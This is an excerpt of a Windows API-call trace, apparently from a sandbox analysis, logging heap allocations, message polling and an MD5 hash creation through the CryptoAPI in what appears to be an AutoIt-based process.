RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0205.289] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.289] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0205.289] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0205.289] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.289] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0205.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0205.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.289] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0205.289] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0205.290] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0205.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e509e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0205.290] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0205.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0205.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0205.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0205.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0205.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0205.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0205.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0205.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54eb8 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0205.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0205.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0205.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.296] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0205.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0205.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0205.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0205.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0205.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0205.299] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0205.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 